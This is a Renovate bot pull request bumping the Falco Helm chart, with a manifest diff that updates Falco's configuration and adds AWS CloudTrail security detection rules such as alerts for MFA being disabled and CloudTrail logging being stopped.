
chore(deps): update helm release falco to v1.19.4 - autoclosed #234

Closed
wants to merge 1 commit

Conversation


@renovate renovate bot commented Jun 6, 2022


This PR contains the following updates:

| Package | Update | Change |
| --- | --- | --- |
| falco (source) | minor | 1.16.0 -> 1.19.4 |
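Renovate labels this change "minor" because only the minor component of the semver moves (1.16.0 -> 1.19.4 keeps major version 1). A minimal sketch of that classification logic (an illustration, not Renovate's actual implementation):

```python
def classify_update(old: str, new: str) -> str:
    """Classify a semver bump as major/minor/patch, the way an
    update bot labels it (simplified: assumes plain X.Y.Z strings)."""
    o = [int(x) for x in old.split(".")]
    n = [int(x) for x in new.split(".")]
    if n[0] != o[0]:
        return "major"
    if n[1] != o[1]:
        return "minor"
    return "patch"

print(classify_update("1.16.0", "1.19.4"))  # minor, as in this PR's title
```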

⚠ Dependency Lookup Warnings ⚠

Warnings were logged while processing this repo. Please check the Dependency Dashboard for more information.


Release Notes

falcosecurity/charts

Versions included in this update (each originally accompanied by a "Compare Source" link for the Falco chart):

v1.19.4, v1.19.3, v1.19.2, v1.19.1, v1.19.0, v1.18.6, v1.18.5, v1.18.4, v1.18.3, v1.18.2, v1.18.1, v1.18.0, v1.17.6, v1.17.5, v1.17.4, v1.17.3, v1.17.2, v1.17.1, v1.17.0, v1.16.4, v1.16.3, v1.16.2, v1.16.1

Configuration

📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Mend Renovate. View repository job log here.
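Automerge is disabled here by configuration. A repository can opt in to automerging chart bumps like this one via `packageRules` in its Renovate config; a hedged sketch (the rule values are illustrative, not this repo's actual config):

```json
{
  "packageRules": [
    {
      "matchDatasources": ["helm"],
      "matchPackageNames": ["falco"],
      "matchUpdateTypes": ["minor", "patch"],
      "automerge": false
    }
  ]
}
```

With `"automerge": true` instead, Renovate would merge passing minor/patch chart updates without manual review.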


github-actions bot commented Jun 6, 2022

Path: cluster/apps/security/falco-system/falco/helm-release.yaml
Version: 1.16.0 -> 1.18.5
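The path above points at a Flux `HelmRelease` manifest; the field Renovate bumps typically sits under `spec.chart.spec.version`. A minimal sketch, assuming Flux v2 and a `HelmRepository` source named `falcosecurity` (the names and intervals are assumptions, not taken from this repo):

```yaml
apiVersion: helm.toolkit.fluxcd.io/v2beta1
kind: HelmRelease
metadata:
  name: falco
  namespace: falco-system
spec:
  interval: 5m
  chart:
    spec:
      chart: falco
      version: 1.16.0   # the field a Renovate helm update rewrites
      sourceRef:
        kind: HelmRepository
        name: falcosecurity
        namespace: flux-system
```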

@@ -153,7 +153,7 @@
     release: "falco"
     heritage: "Helm"
 data:
-  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/k8s_audit_rules.yaml\n  - /etc/falco/rules.d\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. 
This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - \"ignore\": do nothing. If an empty list is provided, ignore is assumed.\n#   - \"log\": log a CRITICAL message noting that the buffer was full.\n#   - \"alert\": emit a falco alert noting that the buffer was full.\n#   - \"exit\": exit falco with a non-zero rc.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of 10 messages.\nsyscall_event_drops:\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 10\n\n# Falco continuously monitors outputs performance. 
When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\n\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\n\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. 
If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\n\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\n\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_audit_endpoint: /k8s-audit\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/server.pem\n\n# Possible additional things you might want to do with program output:\n#   - send to a slack webhook:\n#         program: \"\\\"jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX\\\"\"\n#   - logging (alternate method than syslog):\n#         program: logger -t falco-test\n#   - send over a network connection:\n#         program: nc host.example.com 80\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. 
If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: http://falco-sidekick-falcosidekick:2801\n\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
+  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/k8s_audit_rules.yaml\n  - /etc/falco/rules.d\n\nplugins:\n    - init_config: \"\"\n      library_path: libcloudtrail.so\n      name: cloudtrail\n      open_params: \"\"\n    - init_config: \"\"\n      library_path: libjson.so\n      name: json\n\n# Setting this list to empty ensures that the above plugins are *not*\n# loaded and enabled by default. If you want to use the above plugins,\n# set a meaningful init_config/open_params for the cloudtrail plugin\n# and then change this to:\n# load_plugins: [cloudtrail, json]\nload_plugins:\n    []\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. 
If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When Falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - ignore: do nothing (default when list of actions is empty)\n#   - log: log a DEBUG message noting that the buffer was full\n#   - alert: emit a Falco alert noting that the buffer was full\n#   - exit: exit Falco with a non-zero rc\n#\n# Notice it is not possible to ignore and log/alert messages at the same time.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. 
The rate corresponds to one message every 30 seconds\n# with a burst of one message (by default).\n#\n# The messages are emitted when the percentage of dropped system calls\n# with respect the number of events in the last second\n# is greater than the given threshold (a double in the range [0, 1]).\n#\n# For debugging/testing it is possible to simulate the drops using\n# the `simulate_drops: true`. In this case the threshold does not apply.\nsyscall_event_drops:\n  threshold: 0.1\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 1\n\n# Falco uses a shared buffer between the kernel and userspace to receive\n# the events (eg., system call information) in userspace.\n#\n# Anyways, the underlying libraries can also timeout for various reasons.\n# For example, there could have been issues while reading an event.\n# Or the particular event needs to be skipped.\n# Normally, it's very unlikely that Falco does not receive events consecutively.\n#\n# Falco is able to detect such uncommon situation.\n#\n# Here you can configure the maximum number of consecutive timeouts without an event\n# after which you want Falco to alert.\n# By default this value is set to 1000 consecutive timeouts without an event at all.\n# How this value maps to a time interval depends on the CPU frequency.\nsyscall_event_timeouts:\n  max_consecutives: 1000\n\n# Falco continuously monitors outputs performance. 
When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. 
If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_audit_endpoint: /k8s-audit\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/server.pem\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: 'http://falco-sidekick-falcosidekick:2801'\n  user_agent: falcosecurity/falco\n\n\n# Falco supports running a gRPC server with two main binding types\n# 1. Over the network with mandatory mutual TLS authentication (mTLS)\n# 2. 
Over a local unix socket with no authentication\n# By default, the gRPC server is disabled, with no enabled services (see grpc_output)\n# please comment/uncomment and change accordingly the options below to configure it.\n# Important note: if Falco has any troubles creating the gRPC server\n# this information will be logged, however the main Falco daemon will not be stopped.\n# gRPC server over network with (mandatory) mutual TLS configuration.\n# This gRPC server is secure by default so you need to generate certificates and update their paths here.\n# By default the gRPC server is off.\n# You can configure the address to bind and expose it.\n# By modifying the threadiness configuration you can fine-tune the number of threads (and context) it will use.\n# grpc:\n#   enabled: true\n#   bind_address: \"0.0.0.0:5060\"\n#   # when threadiness is 0, Falco sets it by automatically figuring out the number of online cores\n#   threadiness: 0\n#   private_key: \"/etc/falco/certs/server.key\"\n#   cert_chain: \"/etc/falco/certs/server.crt\"\n#   root_certs: \"/etc/falco/certs/ca.crt\"\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\n# gRPC output service.\n# By default it is off.\n# By enabling this all the output events will be kept in memory until you read them with a gRPC client.\n# Make sure to have a consumer for them or leave this disabled.\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
   application_rules.yaml: |-
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -343,7 +343,449 @@
     #   condition: proc.name in (http_server_binaries) and inbound and fd.sport != 80 and fd.sport != 443
     #   output: "Inbound network traffic to HTTP Server on unexpected port (connection=%fd.name)"
     #   priority: WARNING
-  falco_rules.local.yaml: |
+  aws_cloudtrail_rules.yaml: |
+    #
+    # Copyright (C) 2022 The Falco Authors.
+    #
+    #
+    # Licensed under the Apache License, Version 2.0 (the "License");
+    # you may not use this file except in compliance with the License.
+    # You may obtain a copy of the License at
+    #
+    #     http://www.apache.org/licenses/LICENSE-2.0
+    #
+    # Unless required by applicable law or agreed to in writing, software
+    # distributed under the License is distributed on an "AS IS" BASIS,
+    # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+    # See the License for the specific language governing permissions and
+    # limitations under the License.
+    #
+
+    # All rules files related to plugins should require engine version 10
+    - required_engine_version: 10
+
+    # These rules can be read by cloudtrail plugin version 0.1.0, or
+    # anything semver-compatible.
+    - required_plugin_versions:
+      - name: cloudtrail
+        version: 0.2.3
+      - name: json
+        version: 0.2.2
+
+    # Note that this rule is disabled by default. It's useful only to
+    # verify that the cloudtrail plugin is sending events properly.  The
+    # very broad condition evt.num > 0 only works because the rule source
+    # is limited to aws_cloudtrail. This ensures that the only events that
+    # are matched against the rule are from the cloudtrail plugin (or
+    # a different plugin with the same source).
+    - rule: All Cloudtrail Events
+      desc: Match all cloudtrail events.
+      condition:
+        evt.num > 0
+      output: Some Cloudtrail Event (evtnum=%evt.num info=%evt.plugininfo ts=%evt.time.iso8601 id=%ct.id error=%ct.error)
+      priority: DEBUG
+      tags:
+      - cloud
+      - aws
+      source: aws_cloudtrail
+      enabled: false
+
+    - rule: Console Login Through Assume Role
+      desc: Detect a console login through Assume Role.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+      output:
+        Detected a console login through Assume Role
+        (principal=%ct.user.principalid,
+        assumedRole=%ct.user.arn,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region)
+      priority: WARNING
+      tags:
+      - cloud
+      - aws
+      - aws_console
+      - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Login Without MFA
+      desc: Detect a console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and json.value[/additionalEventData/MFAUsed]="No"
+      output:
+        Detected a console login without MFA
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Root Login Without MFA
+      desc: Detect root console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and json.value[/additionalEventData/MFAUsed]="No"
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and ct.user.identitytype="Root"
+      output:
+        Detected a root console login without MFA.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Deactivate MFA for Root User
+      desc: Detect deactivating MFA configuration for root.
+      condition:
+        ct.name="DeactivateMFADevice" and not ct.error exists
+        and ct.user.identitytype="Root"
+        and ct.request.username="AWS ROOT USER"
+      output:
+        Multi Factor Authentication configuration has been disabled for root
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         MFA serial number=%ct.request.serialnumber)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create AWS user
+      desc: Detect creation of a new AWS user.
+      condition:
+        ct.name="CreateUser" and not ct.error exists
+      output:
+        A new AWS user has been created
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         new user created=%ct.request.username)
+      priority: INFO
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create Group
+      desc: Detect creation of a new user group.
+      condition:
+        ct.name="CreateGroup" and not ct.error exists
+      output:
+        A new user group has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Delete Group
+      desc: Detect deletion of a user group.
+      condition:
+        ct.name="DeleteGroup" and not ct.error exists
+      output:
+        A user group has been deleted.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: ECS Service Created
+      desc: Detect a new service is created in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        ct.name="CreateService" and
+        not ct.error exists
+      output:
+        A new service has been created in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        service name=%ct.request.servicename,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: ECS Task Run or Started
+      desc: Detect a new task is started in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        (ct.name="RunTask" or ct.name="StartTask") and
+        not ct.error exists
+      output:
+        A new task has been started in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: Create Lambda Function
+      desc: Detect creation of a Lambda function.
+      condition:
+        ct.name="CreateFunction20150331" and not ct.error exists
+      output:
+        Lambda function has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Code
+      desc: Detect updates to a Lambda function code.
+      condition:
+        ct.name="UpdateFunctionCode20150331v2" and not ct.error exists
+      output:
+        The code of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Configuration
+      desc: Detect updates to a Lambda function configuration.
+      condition:
+        ct.name="UpdateFunctionConfiguration20150331v2" and not ct.error exists
+      output:
+        The configuration of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Run Instances
+      desc: Detect launching of a specified number of instances.
+      condition:
+        ct.name="RunInstances" and not ct.error exists
+      output:
+        A number of instances have been launched.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    # Only instances launched on regions in this list are approved.
+    - list: approved_regions
+      items:
+        - us-east-0
+
+    - rule: Run Instances in Non-approved Region
+      desc: Detect launching of a specified number of instances in a non-approved region.
+      condition:
+        ct.name="RunInstances" and not ct.error exists and
+        not ct.region in (approved_regions)
+      output:
+        A number of instances have been launched in a non-approved region.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid,
+         image id=%json.value[/responseElements/instancesSet/items/0/instanceId])
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Encryption
+      desc: Detect deleting configuration to use encryption for bucket storage.
+      condition:
+        ct.name="DeleteBucketEncryption" and not ct.error exists
+      output:
+        A encryption configuration for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Public Access Block
+      desc: Detect deleting blocking public access to bucket.
+      condition:
+        ct.name="PutBucketPublicAccessBlock" and not ct.error exists and
+        json.value[/requestParameters/publicAccessBlock]="" and
+          (json.value[/requestParameters/PublicAccessBlockConfiguration/RestrictPublicBuckets]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicPolicy]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicAcls]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/IgnorePublicAcls]=false)
+      output:
+        A public access block for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
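The condition above pairs a JSON-pointer lookup (`json.value[...]`) with four boolean flag checks. As a rough illustration, the same logic can be sketched in Python; the event layout below is a hand-written stand-in for a CloudTrail record, not an official sample:

```python
# Sketch of the "Delete Bucket Public Access Block" condition.
# The record below is a hand-written stand-in for a CloudTrail event.

def json_pointer(doc, pointer):
    """Resolve a JSON pointer like the rule's json.value[/a/b/c]."""
    node = doc
    for part in pointer.strip("/").split("/"):
        if not isinstance(node, dict) or part not in node:
            return None
        node = node[part]
    return node

PAB = "/requestParameters/PublicAccessBlockConfiguration"
FLAGS = ("RestrictPublicBuckets", "BlockPublicPolicy",
         "BlockPublicAcls", "IgnorePublicAcls")

def disables_public_access_block(event):
    return (
        event.get("eventName") == "PutBucketPublicAccessBlock"
        and "errorCode" not in event           # mirrors "not ct.error exists"
        and any(json_pointer(event, PAB + "/" + f) is False for f in FLAGS)
    )

sample = {
    "eventName": "PutBucketPublicAccessBlock",
    "requestParameters": {
        "PublicAccessBlockConfiguration": {
            "RestrictPublicBuckets": False,
            "BlockPublicPolicy": True,
            "BlockPublicAcls": True,
            "IgnorePublicAcls": True,
        }
    },
}
```

Any one flag set to false, with no API error, is enough to fire, mirroring the rule's `or` chain.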
+
+    - rule: List Buckets
+      desc: Detect listing of all S3 buckets.
+      condition:
+        ct.name="ListBuckets" and not ct.error exists
+      output:
+        A list of all S3 buckets has been requested.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         host=%ct.request.host)
+      priority: WARNING
+      enabled: false
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket ACL
+      desc: Detect setting the permissions on an existing bucket using access control lists.
+      condition:
+        ct.name="PutBucketAcl" and not ct.error exists
+      output:
+        The permissions on an existing bucket have been set using access control lists.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket Policy
+      desc: Detect applying an Amazon S3 bucket policy to an Amazon S3 bucket.
+      condition:
+        ct.name="PutBucketPolicy" and not ct.error exists
+      output:
+        An Amazon S3 bucket policy has been applied to an Amazon S3 bucket.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket,
+         policy=%ct.request.policy)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Trail Created
+      desc: Detect creation of a new trail.
+      condition:
+        ct.name="CreateTrail" and not ct.error exists
+      output:
+        A new trail has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         trail name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Logging Disabled
+      desc: CloudTrail logging has been disabled; this could be malicious.
+      condition:
+        ct.name="StopLogging" and not ct.error exists
+      output:
+        The CloudTrail logging has been disabled.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         resource name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+  falco_rules.local.yaml: |-
     #
     # Copyright (C) 2019 The Falco Authors.
     #
@@ -374,9 +816,9 @@
     #   tags: [users, container]
 
     # Or override/append to any rule, macro, or list from the Default Rules
-  falco_rules.yaml: |
+  falco_rules.yaml: |-
     #
-    # Copyright (C) 2020 The Falco Authors.
